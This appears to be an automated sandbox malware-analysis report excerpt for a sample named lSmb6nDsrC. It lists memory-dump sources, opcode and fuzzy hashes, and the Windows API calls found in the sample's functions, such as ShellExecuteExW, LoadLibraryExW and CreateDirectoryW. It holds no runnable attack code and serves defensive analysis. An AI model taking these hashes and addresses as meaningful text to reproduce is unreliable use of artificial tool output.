                                                    • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                    • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
                                                    • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                    • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                    • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                    • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                    • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                    • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                    • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                    • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                    • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                                                    • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                    • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                    • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                                                    • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                    • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                                                    APIs
                                                    • GlobalFree.KERNEL32(006FA6D0), ref: 00401C10
                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocFree
                                                    • String ID: open
                                                    • API String ID: 3394109436-2758837156
                                                    • Opcode ID: ff3bb4655904d23a68ad57a57f0e6bb41085ff7925529a3d00b9d3c0a0b9f2d6
                                                    • Instruction ID: 4f57f46d507340bd06d3479355973fa93edc06c360faa14cbfff374a5dc28ea7
                                                    • Opcode Fuzzy Hash: ff3bb4655904d23a68ad57a57f0e6bb41085ff7925529a3d00b9d3c0a0b9f2d6
                                                    • Instruction Fuzzy Hash: 5721F673904214EBDB30AFA8DE85A5F72B4AB08324714053FF642B32C4C6B8DC418B9D
                                                    APIs
                                                      • Part of subcall function 00405B47: ShellExecuteExW.SHELL32(?), ref: 00405B56
                                                      • Part of subcall function 004069C0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
                                                      • Part of subcall function 004069C0: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                    Strings
                                                    • @, xrefs: 00401F8F
                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                    • String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                    • API String ID: 165873841-3426815298
                                                    • Opcode ID: b8275aa830dd6ac0674c89933b07883deb737523d4cce50d92976ee6336c10c3
                                                    • Instruction ID: 03637a129ab95ddc499dee3230b5434bcfd115e463ad3160f2db423ce5d2e87e
                                                    • Opcode Fuzzy Hash: b8275aa830dd6ac0674c89933b07883deb737523d4cce50d92976ee6336c10c3
                                                    • Instruction Fuzzy Hash: 09112B71A042189ADB50EFB9CA49B8DB6F0AF14308F20457FE505F72D2DBBC89459F18
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069E6
                                                    • GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: ObjectSingleWait$CodeExitProcess
                                                    • String ID:
                                                    • API String ID: 2567322000-0
                                                    • Opcode ID: 2f96d25466b50161d36a247ea1857d3da149f4b0ac0fce789d184ce1e3082720
                                                    • Instruction ID: f1848df8738bec86e5a9e013d2d1160024fdc01f5a204198474b6b1514677e65
                                                    • Opcode Fuzzy Hash: 2f96d25466b50161d36a247ea1857d3da149f4b0ac0fce789d184ce1e3082720
                                                    • Instruction Fuzzy Hash: CCE09272600218BBDB009B54CD02E9E7B6ADB44704F100033BA05B6190C6B19E62DB94
                                                    APIs
                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                    • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                    • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                    • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                    • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                    APIs
                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Window$EnableShow
                                                    • String ID:
                                                    • API String ID: 1136574915-0
                                                    • Opcode ID: c4c1b4cea8914b2dd6fa0ad03ebc8abb8926bacf96e52e223fd2b358d8c96aea
                                                    • Instruction ID: a6cb0e5ea3b461fc76251f348ffd86be0a73501dc920cd99368f231d5504fafc
                                                    • Opcode Fuzzy Hash: c4c1b4cea8914b2dd6fa0ad03ebc8abb8926bacf96e52e223fd2b358d8c96aea
                                                    • Instruction Fuzzy Hash: F2E09A36A082049FE705EBA8AE484AEB3B0EB40325B200A7FE001F11C0CBB94C00866C
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                      • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                      • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                      • Part of subcall function 004068A5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040690B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                    • String ID:
                                                    • API String ID: 2547128583-0
                                                    • Opcode ID: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
                                                    • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                                                    • Opcode Fuzzy Hash: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
                                                    • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCreate
                                                    • String ID:
                                                    • API String ID: 415043291-0
                                                    • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                    • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                    • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                    • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,?,00405BF1,?,?,00000000,00405DC7,?,?,?,?), ref: 00405FF1
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406005
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                    • Instruction ID: 701c1f243114c6c95f20a1fe0a395a260d282ed21d39929bf23a1ad3933a3a4e
                                                    • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                    • Instruction Fuzzy Hash: E9D0C972504220AFD2102728AE0889BBB55DB54271B028A35F8A9A22B0CB314C668694
                                                    APIs
                                                    • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                    • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID:
                                                    • API String ID: 1375471231-0
                                                    • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
